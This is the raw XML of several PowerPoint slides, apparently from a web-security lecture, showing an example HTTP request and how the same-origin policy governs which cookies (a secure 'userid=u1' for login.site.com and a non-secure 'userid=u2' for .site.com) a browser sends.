            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Box 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{772D7775-E3F8-6D46-864B-DE9F4D80A1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25950" y="2192795"/>
            <a:ext cx="340029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000" dirty="0"/>
              <a:t>GET  //URL-domain/URL-path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Cookie:  NAME = VALUE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57347" name="Title 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{009DAB5D-0AA7-6B43-91F4-50558A3E766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SOP for Sending Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE3B03CA-356E-4B4C-AD8C-78628493B0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1801" y="2280107"/>
            <a:ext cx="1128713" cy="838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18" name="AutoShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E2E3E46-9146-E542-8FFC-8A8FBB5CDE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4200" y="2416632"/>
            <a:ext cx="914400" cy="6096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US" dirty="0"/>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F85B46DB-87B4-B647-ABE5-825BACE23C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90800" y="3118307"/>
            <a:ext cx="1524000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 1666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72279FD8-D2DC-AA44-BEA6-F3C5ABF513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90800" y="3346907"/>
            <a:ext cx="1143000" cy="152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21" name="Freeform 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC65A35E-77BD-A44B-A44E-91824525FB07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3714750" y="3113545"/>
            <a:ext cx="400050" cy="385762"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 252"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 243"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 252"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 243"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 252"/>
              <a:gd name="T5" fmla="*/ 0 h 243"/>
              <a:gd name="T6" fmla="*/ 0 w 252"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 243"/>
              <a:gd name="T8" fmla="*/ 0 w 252"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 24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52"/>
              <a:gd name="T16" fmla="*/ 0 h 243"/>
              <a:gd name="T17" fmla="*/ 252 w 252"/>
              <a:gd name="T18" fmla="*/ 243 h 24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52" h="243">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="252" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="243"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:cu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22" name="AutoShape 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C87DA82-842C-0A48-8B87-CECB74C6C5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05800" y="2203907"/>
            <a:ext cx="1219200" cy="1271588"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 26074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US" dirty="0"/>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57354" name="Straight Arrow Connector 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AAF0534-4D10-2E4D-8342-21C8CD25E0C1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114800" y="2569032"/>
            <a:ext cx="4191000" cy="15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7355" name="Straight Arrow Connector 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B181986-95CD-734A-971D-F369218D8AD7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4114800" y="3102432"/>
            <a:ext cx="4191000" cy="15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34571674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ext Box 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E85E7FBC-228C-EE4C-BB59-322397BDA4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2651126"/>
            <a:ext cx="8305800" cy="2206625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="80808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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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 typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /default.asp HTTP/1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Accept: image/gif, image/x-bitmap, image/jpeg, */*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Accept-Language: en</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Connection: Keep-Alive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>If-Modified-Since: Sunday, 17-Apr-96 04:32:58 GMT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99E01A52-85AF-7042-8FBF-58BCF9985D0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HTTP Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18436" name="Text Box 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA398248-43BE-E84D-B918-0E30CEF31A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2009776"/>
            <a:ext cx="94609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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Method</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18437" name="Text Box 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B321957-7BCF-AF43-8DBE-8DCEAFA37F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29000" y="2009776"/>
            <a:ext cx="50526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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>File</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18438" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41198693-E05E-314B-9F3F-C259BF83C3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0" y="2009776"/>
            <a:ext cx="145745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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>HTTP version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18439" name="Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91B31CA1-D4D2-1540-98E2-731AC7A10B3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="2333625"/>
            <a:ext cx="0" cy="28098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8440" name="Line 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7299F5A-48EC-F64A-8B56-C6FEF64695E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="2333625"/>
            <a:ext cx="0" cy="28098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8441" name="Line 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA078874-1E0D-CA41-9B8D-57FCF47A2557}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5257800" y="2333625"/>
            <a:ext cx="0" cy="28098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8442" name="Text Box 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD5E3A0F-08A2-5A49-9814-36EEC13353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91600" y="2009776"/>
            <a:ext cx="98616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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Headers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18443" name="Line 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE807A30-FFA3-8D4D-92CF-B920B8A2BD1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763000" y="2386013"/>
            <a:ext cx="609600" cy="533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8444" name="Text Box 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B4FC3C6-9C66-E54F-AEEA-4E0B95BD50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71800" y="5272088"/>
            <a:ext cx="216116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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Data – none for GET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18445" name="Line 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C5ED324-6FA4-0E4C-AA2E-24A556C58A3C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2209800" y="4733925"/>
            <a:ext cx="762000" cy="6096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8446" name="Text Box 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46299021-D7EE-2545-9828-36780C9EDB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0" y="4905376"/>
            <a:ext cx="109837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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Blank line</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18447" name="Line 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8303DC83-60BB-3642-8A7E-3072F3575699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2209800" y="4429125"/>
            <a:ext cx="2362200" cy="6096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89091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Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4FF8006-F67F-2247-95F5-A481E68E0A9C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020888" y="4659313"/>
            <a:ext cx="3810000" cy="1676400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="4114800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>checkout.site.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="4114800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>login.site.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="4114800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>login.site.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="4114800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128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1D92C7-D25F-4F4C-AD17-CFF4A80F1340}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362200" y="2054683"/>
            <a:ext cx="2521844" cy="17543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u="sng" dirty="0"/>
              <a:t>cookie 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>value = 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u1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>domain = </a:t>
            </a:r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login.site.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>path = </a:t>
            </a:r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/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>secure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06C026-5A76-4B4B-9411-D71B1EC57218}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6523039" y="2054683"/>
            <a:ext cx="2042547" cy="17543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u="sng" dirty="0"/>
              <a:t>cookie 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>value = 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u2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>domain = </a:t>
            </a:r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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>site.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>path = </a:t>
            </a:r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/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>non-secure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8198" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{632E0847-2D99-414D-8BAA-B781C2C9A8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6571" y="3899397"/>
            <a:ext cx="2943434" cy="4023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000" dirty="0"/>
              <a:t>both set by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>login.site.com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BF2F1D-741E-1245-A21D-537FD19749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32500" y="4708742"/>
            <a:ext cx="3882794" cy="14568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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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ts val="1000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=u2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=u2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=u1; </a:t>
            </a:r>
            <a:r>
